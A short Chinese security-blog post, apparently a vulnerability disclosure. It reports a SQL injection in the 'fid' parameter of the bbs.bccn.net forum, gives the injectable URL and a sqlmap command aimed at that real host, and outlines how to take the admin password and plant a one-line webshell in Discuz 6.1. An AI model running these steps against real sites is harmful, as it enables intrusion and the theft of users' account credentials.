编程中国论坛sql注入可获取Webshell – 网站安全 –

时间: 2020-10-11|tag: 43次围观|0 条评论

编程中国旗下论坛sql注入+webshell,近80W的程序员账号密码泄露!!!

存在注射参数:fid

注射URL:

 

http://bbs.bccn.net/zzz/bzml/view.php?fid=*

sqlmap -u http://bbs.bccn.net/zzz/bzml/view.php?fid=* --dbs

论坛Discuz版本为6.1,得到管理员密码后登陆后台,自写wordwrap和unserialize导入一句话代码,获取webshell

 

编程中国论坛sql注入可获取Webshell – 网站安全 –插图

将近80W的程序员账号、密码、邮箱存在泄露威胁

 

编程中国论坛sql注入可获取Webshell – 网站安全 –插图1

 

编程中国论坛sql注入可获取Webshell – 网站安全 –插图2

 

 

修复方案:

赶紧修复
    上一篇: 用友某系统任意文件读取 - 网站安全 - 自学php

    下一篇: 利用CSRF绑定有道云笔记并推送恶意信息 - 网站安
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《编程中国论坛sql注入可获取Webshell – 网站安全 –
   

还没有人抢沙发呢~